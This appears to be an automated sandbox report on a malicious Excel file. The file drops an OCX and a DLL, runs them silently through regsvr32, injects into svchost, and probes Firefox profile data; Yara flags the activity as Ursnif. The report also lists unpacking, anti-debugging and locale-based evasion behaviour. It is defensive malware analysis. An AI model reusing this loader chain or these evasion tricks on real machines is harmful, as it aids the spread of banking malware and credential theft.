          Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s /i dDdoiBj.ocx
          Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /K
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 696
          Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\BN6D10.tmp C:\Users\user\AppData\Local\Temp\BN6D10.tmp
          Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
          Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5712 CREDAT:17410 /prefetch:2
          Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
          Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5752 CREDAT:17410 /prefetch:2
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s /i dDdoiBj.ocxJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /KJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\BN6D10.tmp C:\Users\user\AppData\Local\Temp\BN6D10.tmpJump to behavior
          Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5712 CREDAT:17410 /prefetch:2
          Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5752 CREDAT:17410 /prefetch:2
          Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
          Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000B.00000003.455787044.0000000000C77000.00000004.00000001.sdmp
          Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000B.00000003.466553295.0000000002E42000.00000004.00000040.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000B.00000003.466527743.0000000004E11000.00000004.00000001.sdmp
          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000B.00000003.466602255.0000000002E40000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000B.00000003.466527743.0000000004E11000.00000004.00000001.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000B.00000003.466553295.0000000002E42000.00000004.00000040.sdmp
          Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000B.00000003.466527743.0000000004E11000.00000004.00000001.sdmp
          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: advapi32.pdbXuO source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: shell32.pdb source: WerFault.exe, 0000000B.00000003.466553295.0000000002E42000.00000004.00000040.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000B.00000003.466527743.0000000004E11000.00000004.00000001.sdmp
          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000B.00000003.455841441.0000000000C7D000.00000004.00000001.sdmp
          Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: mpr.pdb source: WerFault.exe, 0000000B.00000003.466602255.0000000002E40000.00000004.00000040.sdmp
          Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000B.00000003.466527743.0000000004E11000.00000004.00000001.sdmp
          Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: fCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000B.00000002.475049315.0000000000712000.00000004.00000010.sdmp
          Source: Binary string: regsvr32.pdb source: WerFault.exe, 0000000B.00000003.466527743.0000000004E11000.00000004.00000001.sdmp
          Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: shcore.pdbk source: WerFault.exe, 0000000B.00000003.466553295.0000000002E42000.00000004.00000040.sdmp
          Source: Binary string: profapi.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: comdlg32.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: winspool.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000B.00000003.466527743.0000000004E11000.00000004.00000001.sdmp
          Source: Binary string: shell32.pdbk source: WerFault.exe, 0000000B.00000003.466553295.0000000002E42000.00000004.00000040.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000B.00000003.466553295.0000000002E42000.00000004.00000040.sdmp
          Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000000B.00000003.466553295.0000000002E42000.00000004.00000040.sdmp
          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: ole32.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000B.00000003.466527743.0000000004E11000.00000004.00000001.sdmp
          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000B.00000003.466602255.0000000002E40000.00000004.00000040.sdmp
          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000B.00000003.455841441.0000000000C7D000.00000004.00000001.sdmp
          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000B.00000003.466553295.0000000002E42000.00000004.00000040.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.466602255.0000000002E40000.00000004.00000040.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000B.00000003.466602255.0000000002E40000.00000004.00000040.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: sfc.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000B.00000003.466527743.0000000004E11000.00000004.00000001.sdmp
          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.466527743.0000000004E11000.00000004.00000001.sdmp
          Source: Binary string: comctl32.pdb source: WerFault.exe, 0000000B.00000003.466565176.0000000002E48000.00000004.00000040.sdmp
          Source: tr_0.xlsInitial sample: OLE indicators vbamacros = False

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpUnpacked PE file: 13.2.BN6D10.tmp.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpUnpacked PE file: 13.2.BN6D10.tmp.400000.0.unpack
          Yara detected aPLib compressed binaryShow sources
          Source: Yara matchFile source: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.460854186.0000000005C00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.440869721.0000000005800000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.461350530.0000000005100000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.458028337.0000000005100000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.461304914.0000000005A01000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3708, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5128, type: MEMORY
          Source: Yara matchFile source: 6.3.svchost.exe.5800000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.svchost.exe.5100000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.svchost.exe.5c00000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.svchost.exe.bc00000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.svchost.exe.5c00000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.svchost.exe.5c00000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.svchost.exe.bc00000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.svchost.exe.10000000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.svchost.exe.10000000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.svchost.exe.5800000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.svchost.exe.5100000.1.raw.unpack, type: UNPACKEDPE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_02443800 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,6_2_02443800
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_046B85C0 push edx; ret 5_2_046B874E
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_046B24BD push edi; ret 5_2_046B24BE
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_046B0764 pushfd ; retf 5_2_046B0765
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_046B48BD push edx; iretd 5_2_046B48BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0BC0B7F5 push ecx; ret 12_2_0BC0B808
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpCode function: 13_2_00F673B1 push es; ret 13_2_00F673D5
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpCode function: 13_2_00F6B26C push es; iretd 13_2_00F6B2B2
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpCode function: 13_2_00F6D91E push ax; iretd 13_2_00F6D913
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpCode function: 13_2_00F6D90A push ax; iretd 13_2_00F6D913

          Persistence and Installation Behavior:

          barindex
          Drops PE files to the document folder of the userShow sources
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Documents\dDdoiBj.ocxJump to dropped file
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dllJump to dropped file
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Documents\dDdoiBj.ocxJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\BN6D10.tmpJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 0000000D.00000003.549497164.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549218494.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549333620.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549457976.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549162557.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549367546.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549299177.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549421669.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: BN6D10.tmp PID: 1940, type: MEMORY
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0BC061DF lstrlenA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_0BC061DF
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Found evasive API chain (may stop execution after checking locale)Show sources
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpEvasive API call chain: GetLocaleInfo, StrStr, ExitProcessgraph_13-1088
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-7014
          Source: C:\Windows\SysWOW64\svchost.exe TID: 2980Thread sleep count: 212 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exe TID: 2980Thread sleep time: -12720000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exe TID: 2980Thread sleep count: 210 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exe TID: 2980Thread sleep time: -12600000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exe TID: 2980Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_100068C0 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,6_2_100068C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_1000419E FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,6_2_1000419E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_10004DF4 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,6_2_10004DF4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_10007241 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,6_2_10007241
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_10004A84 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,6_2_10004A84
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_1000673C FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,6_2_1000673C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0BC01FD3 FindFirstFileA,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,12_2_0BC01FD3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0BC03D27 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,12_2_0BC03D27
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0BC06401 FindFirstFileA,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,12_2_0BC06401
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_02443690 GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,6_2_02443690
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\storage\default\moz-extension+++9d374279-4999-47ca-a38c-091873886ffd^userContextId=4294967295\idb\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\storage\default\about+newtab\idb\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\storage\default\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\storage\default\about+newtab\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\storage\default\moz-extension+++9d374279-4999-47ca-a38c-091873886ffd^userContextId=4294967295\Jump to behavior
          Source: WerFault.exe, 0000000B.00000002.479728419.0000000004F70000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: svchost.exe, 00000006.00000002.708057638.0000000002859000.00000004.00000001.sdmpBinary or memory string: MSAFD Irda [IrDA]Hyper-V RAWMozilla/4.0 (compatible; MSIE 8.0; Windows Phone OS 7.5; Trident/4.0; IEMobile/8.0)Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Mobile Safari/537.36 Edge/17.17134Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/8.0; Touch; rv:11.0; IEMobile/11.0) like GeckowbG`|M
          Source: svchost.exe, 00000006.00000002.707985269.0000000002846000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
          Source: svchost.exe, 00000006.00000002.707778201.0000000002800000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW(
          Source: WerFault.exe, 0000000B.00000002.479728419.0000000004F70000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: WerFault.exe, 0000000B.00000002.479728419.0000000004F70000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: WerFault.exe, 0000000B.00000002.479728419.0000000004F70000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end nodegraph_6-7098
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpAPI call chain: ExitProcess graph end nodegraph_13-996
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_046B7C00 LdrInitializeThunk,VirtualAlloc,5_2_046B7C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0BC09FDC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0BC09FDC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_02443800 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,6_2_02443800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_02442B50 mov eax, dword ptr fs:[00000030h]6_2_02442B50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_10009F63 mov eax, dword ptr fs:[00000030h]6_2_10009F63
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0BC09DF5 mov eax, dword ptr fs:[00000030h]12_2_0BC09DF5
